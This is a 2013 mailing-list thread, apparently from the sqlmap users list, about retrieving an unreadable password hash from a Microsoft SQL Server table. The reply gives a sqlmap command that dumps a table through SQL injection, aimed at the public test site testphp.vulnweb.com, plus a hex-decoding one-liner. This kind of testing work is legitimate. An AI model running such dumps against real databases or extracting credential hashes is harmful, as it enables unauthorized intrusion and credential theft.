Hi.
Use --binary-fields option for retrieving binary data. It will retrieve and
represent data in it's hexadecimal form. Afterwards you can decode that
data into it's binary form by yourself.
Example:
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=2"
--technique=BU --dump -T artists -D acuart --binary-fields=adesc
| artist_id | aname | adesc
...........
| 1 | r4w8173 |
3C703E0A4C6F72656D20697073756D20646F6C6F722073697420616D65742C20636F6E7365637465747565722061646970697363696E6720656C69742E20446F6E6563206D6F6C65737469652E0A2020202053656420616C697175616D2073656D20757420617263752E2050686173656C6C757320736F6C6C696369747564696E2E20566573746962756C756D20636F6E64696D656E74756D20666163696C697369730A202020206E756C6C612E20496E206861632068616269746173736520706C617465612064696374756D73742E204E756C6C61206E6F6E756D6D792E20437261732071756973206C696265726F2E0A20202020437261732076656E656E617469732E20416C697175616D20706F7375657265206C6F626F7274697320706564652E204E756C6C616D206672696E67696C6C612075726E61206964206C656F2E0A202020205072616573656E7420616C6971756574207072657469756D20657261742E205072616573656E74206E6F6E206F64696F2E2050656C6C656E7465737175652061206D61676E6120610A202020206D61757269732076756C707574617465206C6163696E69612E2041.............
Example of manual decoding:
python -c "print '3C703E0A4C6F72656D20697073756D20646F'.decode('hex')"
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Kind regards,
Miroslav Stampar
On Tue, Aug 20, 2013 at 8:04 PM, Brandon Perry <bperry.volat...@gmail.com>wrote:
> The hash will be stored as binary data, so the pairs (0xab0xcd0xef) will
> give you the actual hash (abcdef) instead of expecting the 0xab to be an
> ASCII printable representation of a byte of the hash.
>
> Make sense?
>
> Sent from a computer
>
> On Aug 20, 2013, at 12:48, Douglas Brancaglion <douglas.rea...@gmail.com>
> wrote:
>
>
> Brandon, you know how I can extract a hash (md5 or sha) that?
>
> Tks!
>
> 2013/8/20 Brandon Perry <bperry.volat...@gmail.com>
>
>> Or binary md5
>>
>> Sent from a computer
>>
>> On Aug 20, 2013, at 7:56, Douglas Brancaglion <douglas.rea...@gmail.com>
>> wrote:
>>
>>
>> Hello guys, I have researched a lot about my case even more could not get an
>> answer that resolves my problem.
>>
>> In some tests I came across a possible "hash" that is within a table in a
>> microsoft sql server that is coming with the hash sooo weird, I
>> personally have never seen.
>>
>> I've tried to convert it in several encodes, however no success.
>>
>> Does anyone of you have seen similar case?
>>
>> Below is an example of this "hash"
>>
>> \ \ x8cĐ \ \ x14Z \ \ xa8 \ \ xd7 # | ż \ \ x04YŚ \ \ xfa? \ \ x82Ę \ \
>> x18] Š \ \ x02E \ \ x8A \ \ xdf \ \ x80Ĺ \ \ x08P \ \ x9eă
>>
>> --
>> Douglas Brancaglion
>> Security Analist
>>
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